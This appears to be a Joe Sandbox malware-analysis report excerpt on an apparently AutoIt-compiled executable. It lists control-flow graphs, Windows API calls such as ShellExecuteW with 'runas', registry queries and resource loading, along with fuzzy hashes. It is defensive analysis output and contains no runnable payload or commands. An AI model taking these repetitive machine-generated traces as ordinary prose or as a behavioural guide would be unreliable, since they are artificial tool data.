                                          control_flow_graph 224 e442de-e4434d call e4a961 GetVersionExW call e46b57 229 e44353 224->229 230 e83617-e8362a 224->230 232 e44355-e44357 229->232 231 e8362b-e8362f 230->231 233 e83631 231->233 234 e83632-e8363e 231->234 235 e4435d-e443bc call e493b2 call e437a0 232->235 236 e83656 232->236 233->234 234->231 237 e83640-e83642 234->237 250 e443c2-e443c4 235->250 251 e837df-e837e6 235->251 240 e8365d-e83660 236->240 237->232 239 e83648-e8364f 237->239 239->230 242 e83651 239->242 243 e83666-e836a8 240->243 244 e4441b-e44435 GetCurrentProcess IsWow64Process 240->244 242->236 243->244 249 e836ae-e836b1 243->249 247 e44494-e4449a 244->247 248 e44437 244->248 252 e4443d-e44449 247->252 248->252 253 e836db-e836e5 249->253 254 e836b3-e836bd 249->254 250->240 257 e443ca-e443dd 250->257 258 e837e8 251->258 259 e83806-e83809 251->259 262 e4444f-e4445e LoadLibraryA 252->262 263 e83824-e83828 GetSystemInfo 252->263 260 e836f8-e83702 253->260 261 e836e7-e836f3 253->261 255 e836ca-e836d6 254->255 256 e836bf-e836c5 254->256 255->244 256->244 264 e443e3-e443e5 257->264 265 e83726-e8372f 257->265 266 e837ee 258->266 269 e8380b-e8381a 259->269 270 e837f4-e837fc 259->270 267 e83704-e83710 260->267 268 e83715-e83721 260->268 261->244 271 e44460-e4446e GetProcAddress 262->271 272 e4449c-e444a6 GetSystemInfo 262->272 274 e8374d-e83762 264->274 275 e443eb-e443ee 264->275 276 e8373c-e83748 265->276 277 e83731-e83737 265->277 266->270 267->244 268->244 269->266 278 e8381c-e83822 269->278 270->259 271->272 279 e44470-e44474 GetNativeSystemInfo 271->279 273 e44476-e44478 272->273 284 e44481-e44493 273->284 285 e4447a-e4447b FreeLibrary 273->285 282 e8376f-e8377b 274->282 283 e83764-e8376a 274->283 280 e443f4-e4440f 275->280 281 e83791-e83794 275->281 276->244 277->244 278->270 279->273 286 e44415 280->286 287 e83780-e8378c 280->287 281->244 288 e8379a-e837c1 281->288 282->244 283->244 285->284 286->244 287->244 289 e837ce-e837da 288->289 290 e837c3-e837c9 288->290 289->244 290->244
                                          APIs
                                          • GetVersionExW.KERNEL32 ref: 00E4430D
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • GetCurrentProcess.KERNEL32 ref: 00E44422
                                          • IsWow64Process.KERNEL32(00000000), ref: 00E44429
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44454
                                          • GetProcAddress.KERNEL32 ref: 00E44466
                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E44474
                                          • FreeLibrary.KERNEL32 ref: 00E4447B
                                          • GetSystemInfo.KERNEL32(?), ref: 00E444A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                          • API String ID: 3290436268-3101561225
                                          • Opcode ID: 55941ee0db4d2db7a7b1c936f5701276e1fbcfd795493416a6c3f8266a7ba100
                                          • Instruction ID: 7e891b8ae1a9f849d49a28f14ab25ab6c192494d1c276d11c875a358c8364e24
                                          • Opcode Fuzzy Hash: 55941ee0db4d2db7a7b1c936f5701276e1fbcfd795493416a6c3f8266a7ba100
                                          • Instruction Fuzzy Hash: 08A1E9A190A2CCCFCB11D7B97C443D57FE47B26744F1AE49AD2B5B3A6AD2204508FB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 650 e442a2-e442ba CreateStreamOnHGlobal 651 e442bc-e442d3 FindResourceExW 650->651 652 e442da-e442dd 650->652 653 e835ba-e835c9 LoadResource 651->653 654 e442d9 651->654 653->654 655 e835cf-e835dd SizeofResource 653->655 654->652 655->654 656 e835e3-e835ee LockResource 655->656 656->654 657 e835f4-e83612 656->657 657->654
                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00E442B2
                                          • FindResourceExW.KERNEL32 ref: 00E442C9
                                          • LoadResource.KERNEL32 ref: 00E835BE
                                          • SizeofResource.KERNEL32 ref: 00E835D3
                                          • LockResource.KERNEL32(00E450AA), ref: 00E835E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: bf7bf6858f7e86f03d62575d058c309ed6313114d24fcc938d0133725c613de7
                                          • Instruction ID: caefd118e8bb3fa077b05847d81d1a1f8703c33c99367eba407977702178dde0
                                          • Opcode Fuzzy Hash: bf7bf6858f7e86f03d62575d058c309ed6313114d24fcc938d0133725c613de7
                                          • Instruction Fuzzy Hash: BA1170B0201701BFDB219B66EC48F677BB9EBC5B95F20416EB406A62A0DBB1D804C620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EADBBE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 864 eadbbe-eadbda lstrlenW 865 eadbdc-eadbe6 GetFileAttributesW 864->865 866 eadc06 864->866 867 eadc09-eadc0d 865->867 868 eadbe8-eadbf7 FindFirstFileW 865->868 866->867 868->866 869 eadbf9-eadc04 FindClose 868->869 869->867
                                          APIs
                                          • lstrlenW.KERNEL32 ref: 00EADBCE
                                          • GetFileAttributesW.KERNELBASE ref: 00EADBDD
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00EADBEE
                                          • FindClose.KERNEL32(00000000), ref: 00EADBFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                          • String ID: "R
                                          • API String ID: 2695905019-1746183819
                                          • Opcode ID: 23680e49f2c7b13fb65c4a8b442a3f815f9aa95cd02b832c9cda0759f026c88c
                                          • Instruction ID: 1ad0a862d29b0573d466b0620cedc4557a32206d62cf6bf6475ea8b42e7b5180
                                          • Opcode Fuzzy Hash: 23680e49f2c7b13fb65c4a8b442a3f815f9aa95cd02b832c9cda0759f026c88c
                                          • Instruction Fuzzy Hash: 49F0A7304159155B82206B78AC0D4AA777CDF06374B604713F476E24F0EBB46D58C595
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E82BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00E42B6B
                                            • Part of subcall function 00E43A5A: GetModuleFileNameW.KERNEL32 ref: 00E43A78
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • GetForegroundWindow.USER32 ref: 00E82C10
                                          • ShellExecuteW.SHELL32(00000000,?,?,00F02224), ref: 00E82C17
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                          • String ID: runas
                                          • API String ID: 448630720-4000483414
                                          • Opcode ID: 8655c0df3c7291004170dd55efd969aa765f09b9c66caea49f4c7f2c473399b2
                                          • Instruction ID: f46fb37f4ff973cf8c4d50e6498dad5a10b0db843badc3088fa0bd293791ae82
                                          • Opcode Fuzzy Hash: 8655c0df3c7291004170dd55efd969aa765f09b9c66caea49f4c7f2c473399b2
                                          • Instruction Fuzzy Hash: 7B11E1316083056AC704FF70F8559AEB7E4EB95744F84342DF286320A3CF618A49E712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32 ref: 00E7337E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime
                                          • API String ID: 2086374402-595813830
                                          • Opcode ID: 4ae1846c689d806d97b816933502de8857f8cd0ace1e755a1fe0004b796c8019
                                          • Instruction ID: e446938e3778a54dfe950c199613cbcdbfe81bf71860c653c915eb28496382a7
                                          • Opcode Fuzzy Hash: 4ae1846c689d806d97b816933502de8857f8cd0ace1e755a1fe0004b796c8019
                                          • Instruction Fuzzy Hash: 2FE0E531B4131CBFD320AFA6AC02D7EBBD4DB48B90B40525DFA097B661CE310E00A6D6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00E609DA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 128992c9a0924e98686d029631696cc138958293d2a4f309f701d02586dc4cb1
                                          • Instruction ID: a51352dea29d5da1aae6c28f4b69eb0c5a151e18a0a3b1a529b1576b1b15d2aa
                                          • Opcode Fuzzy Hash: 128992c9a0924e98686d029631696cc138958293d2a4f309f701d02586dc4cb1
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4D7CB Relevance: 21.6, APIs: 14, Instructions: 579windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetInputState.USER32 ref: 00E4D807
                                          • timeGetTime.WINMM ref: 00E4DA07
                                          • PeekMessageW.USER32(?), ref: 00E4DB28
                                          • TranslateMessage.USER32(?), ref: 00E4DB7B
                                          • DispatchMessageW.USER32(?), ref: 00E4DB89
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4DB9F
                                          • Sleep.KERNEL32(0000000A), ref: 00E4DBB1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                          • String ID:
                                          • API String ID: 2189390790-0
                                          • Opcode ID: 00ea24a60fceacd60a2caebd8b739032ce0b5e2ba8591e42d30cf76f2947253a
                                          • Instruction ID: 76e950fc517d326a126ad6d4ba2887cbe8280b2359fa1bcecc8b89633475a5ee
                                          • Opcode Fuzzy Hash: 00ea24a60fceacd60a2caebd8b739032ce0b5e2ba8591e42d30cf76f2947253a
                                          • Instruction Fuzzy Hash: AE32C330608342EFDB28CF24DC84BAAB7E1FF85308F14A55EE655A7291D771E844DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E78D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 291 e78d45-e78d55 292 e78d57-e78d6a call e6f2c6 call e6f2d9 291->292 293 e78d6f-e78d71 291->293 307 e790f1 292->307 295 e78d77-e78d7d 293->295 296 e790d9-e790e6 call e6f2c6 call e6f2d9 293->296 295->296 299 e78d83-e78dae 295->299 314 e790ec call e727ec 296->314 299->296 302 e78db4-e78dbd 299->302 305 e78dd7-e78dd9 302->305 306 e78dbf-e78dd2 call e6f2c6 call e6f2d9 302->306 310 e790d5-e790d7 305->310 311 e78ddf-e78de3 305->311 306->314 313 e790f4-e790f9 307->313 310->313 311->310 312 e78de9-e78ded 311->312 312->306 316 e78def-e78e06 312->316 314->307 319 e78e23-e78e2c 316->319 320 e78e08-e78e0b 316->320 324 e78e2e-e78e45 call e6f2c6 call e6f2d9 call e727ec 319->324 325 e78e4a-e78e54 319->325 322 e78e15-e78e1e 320->322 323 e78e0d-e78e13 320->323 326 e78ebf-e78ed9 322->326 323->322 323->324 356 e7900c 324->356 328 e78e56-e78e58 325->328 329 e78e5b-e78e79 call e73820 call e729c8 * 2 325->329 332 e78edf-e78eef 326->332 333 e78fad-e78fb6 call e7f89b 326->333 328->329 360 e78e96-e78ebc call e79424 329->360 361 e78e7b-e78e91 call e6f2d9 call e6f2c6 329->361 332->333 334 e78ef5-e78ef7 332->334 345 e79029 333->345 346 e78fb8-e78fca 333->346 334->333 338 e78efd-e78f23 334->338 338->333 342 e78f29-e78f3c 338->342 342->333 347 e78f3e-e78f40 342->347 349 e7902d-e79045 ReadFile 345->349 346->345 351 e78fcc-e78fdb GetConsoleMode 346->351 347->333 352 e78f42-e78f6d 347->352 354 e79047-e7904d 349->354 355 e790a1-e790ac GetLastError 349->355 351->345 357 e78fdd-e78fe1 351->357 352->333 359 e78f6f-e78f82 352->359 354->355 364 e7904f 354->364 362 e790c5-e790c8 355->362 363 e790ae-e790c0 call e6f2d9 call e6f2c6 355->363 358 e7900f-e79019 call e729c8 356->358 357->349 365 e78fe3-e78ffd ReadConsoleW 357->365 358->313 359->333 369 e78f84-e78f86 359->369 360->326 361->356 366 e79005-e7900b call e6f2a3 362->366 367 e790ce-e790d0 362->367 363->356 373 e79052-e79064 364->373 374 e78fff GetLastError 365->374 375 e7901e-e79027 365->375 366->356 367->358 369->333 378 e78f88-e78fa8 369->378 373->358 382 e79066-e7906a 373->382 374->366 375->373 378->333 386 e79083-e7908e 382->386 387 e7906c-e7907c call e78a61 382->387 388 e79090 call e78bb1 386->388 389 e7909a-e7909f call e788a1 386->389 396 e7907f-e79081 387->396 397 e79095-e79098 388->397 389->397 396->358 397->396
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-3963672497
                                          • Opcode ID: 2d03679ce215338fdbec8dbb71d62f470b65918346b897830186462c8c3d5592
                                          • Instruction ID: 01b15b178c08e32abd94f0ceea9bf65856c3ced2908146a2ba4fb7a69d4c1d28
                                          • Opcode Fuzzy Hash: 2d03679ce215338fdbec8dbb71d62f470b65918346b897830186462c8c3d5592
                                          • Instruction Fuzzy Hash: 2FC10274A44249AFCB11DFA8E845BEDBBF0AF5A314F189199F518B7392CB308941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E8065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 e8065b-e8068b call e8042f 402 e8068d-e80698 call e6f2c6 399->402 403 e806a6-e806b2 call e75221 399->403 408 e8069a-e806a1 call e6f2d9 402->408 409 e806cb-e80714 call e8039a 403->409 410 e806b4-e806c9 call e6f2c6 call e6f2d9 403->410 420 e8097d-e80983 408->420 418 e80781-e8078a GetFileType 409->418 419 e80716-e8071f 409->419 410->408 421 e8078c-e807bd GetLastError call e6f2a3 CloseHandle 418->421 422 e807d3-e807d6 418->422 424 e80721-e80725 419->424 425 e80756-e8077c GetLastError call e6f2a3 419->425 421->408 436 e807c3-e807ce call e6f2d9 421->436 427 e807d8-e807dd 422->427 428 e807df-e807e5 422->428 424->425 429 e80727-e80754 call e8039a 424->429 425->408 432 e807e9-e80837 call e7516a 427->432 428->432 433 e807e7 428->433 429->418 429->425 442 e80839-e80845 call e805ab 432->442 443 e80847-e8086b call e8014d 432->443 433->432 436->408 442->443 448 e8086f-e80879 call e786ae 442->448 449 e8086d 443->449 450 e8087e-e808c1 443->450 448->420 449->448 452 e808e2-e808f0 450->452 453 e808c3-e808c7 450->453 456 e8097b 452->456 457 e808f6-e808fa 452->457 453->452 455 e808c9-e808dd 453->455 455->452 456->420 457->456 458 e808fc-e8092f CloseHandle call e8039a 457->458 461 e80931-e8095d GetLastError call e6f2a3 call e75333 458->461 462 e80963-e80977 458->462 461->462 462->456
                                          APIs
                                            • Part of subcall function 00E8039A: CreateFileW.KERNELBASE(00000000,00000000,?,00E80704,?,?,00000000), ref: 00E803B7
                                          • GetLastError.KERNEL32 ref: 00E8076F
                                          • __dosmaperr.LIBCMT ref: 00E80776
                                          • GetFileType.KERNELBASE ref: 00E80782
                                          • GetLastError.KERNEL32 ref: 00E8078C
                                          • __dosmaperr.LIBCMT ref: 00E80795
                                          • CloseHandle.KERNEL32(00000000), ref: 00E807B5
                                          • CloseHandle.KERNEL32(?), ref: 00E808FF
                                          • GetLastError.KERNEL32 ref: 00E80931
                                          • __dosmaperr.LIBCMT ref: 00E80938
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: bb69f6e68918d2510af801f9492ac9b0690b822613d4545590ae60814c7113f8
                                          • Instruction ID: ae7644bbac790e77f938957f31d143e5fc07c5f795180ae25235f0550d80ef6d
                                          • Opcode Fuzzy Hash: bb69f6e68918d2510af801f9492ac9b0690b822613d4545590ae60814c7113f8
                                          • Instruction Fuzzy Hash: ACA12832A001088FDF19FF68D852BAD7BE0EB46324F14515AF819BB2A1DB319857DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E43A5A: GetModuleFileNameW.KERNEL32 ref: 00E43A78
                                            • Part of subcall function 00E43357: GetFullPathNameW.KERNEL32 ref: 00E43379
                                          • RegOpenKeyExW.KERNEL32 ref: 00E4356A
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E8318D
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00E831CE
                                          • RegCloseKey.ADVAPI32(?), ref: 00E83210
                                          • _wcslen.LIBCMT ref: 00E83277
                                          • _wcslen.LIBCMT ref: 00E83286
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 98802146-2727554177
                                          • Opcode ID: d983599744ef26319b2e722420e97616d66c5f267ca3526e6d6596c343b657bf
                                          • Instruction ID: 57395be05b935978e8c3e4806856c8ef9ad9b418b38b557ed1ab86f643a0d5ec
                                          • Opcode Fuzzy Hash: d983599744ef26319b2e722420e97616d66c5f267ca3526e6d6596c343b657bf
                                          • Instruction Fuzzy Hash: FA71D2714053059EC304EFA9EC8299BBBE8FF84740F41682EF559E31B1EB348A58DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32 ref: 00E42B8E
                                          • LoadCursorW.USER32 ref: 00E42B9D
                                          • LoadIconW.USER32 ref: 00E42BB3
                                          • LoadIconW.USER32 ref: 00E42BC5
                                          • LoadIconW.USER32 ref: 00E42BD7
                                          • LoadImageW.USER32 ref: 00E42BEF
                                          • RegisterClassExW.USER32(?), ref: 00E42C40
                                            • Part of subcall function 00E42CD4: GetSysColorBrush.USER32 ref: 00E42D07
                                            • Part of subcall function 00E42CD4: RegisterClassExW.USER32(00000030), ref: 00E42D31
                                            • Part of subcall function 00E42CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E42D42
                                            • Part of subcall function 00E42CD4: InitCommonControlsEx.COMCTL32(?), ref: 00E42D5F
                                            • Part of subcall function 00E42CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E42D6F
                                            • Part of subcall function 00E42CD4: LoadIconW.USER32 ref: 00E42D85
                                            • Part of subcall function 00E42CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E42D94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 0b06074dbe8a0b1bb6dff4812a178da5b4f906c99f0348c7573943ad9342f674
                                          • Instruction ID: a8e15f0da920cc09ad9ab405f9d24cefa9c2440b6be9bc3cc87eaad3762d1764
                                          • Opcode Fuzzy Hash: 0b06074dbe8a0b1bb6dff4812a178da5b4f906c99f0348c7573943ad9342f674
                                          • Instruction Fuzzy Hash: AD212C70E02318AFDB109FA6EC55ADABFB4FB48B50F11801BF610B66A4D7B11554EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E43170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
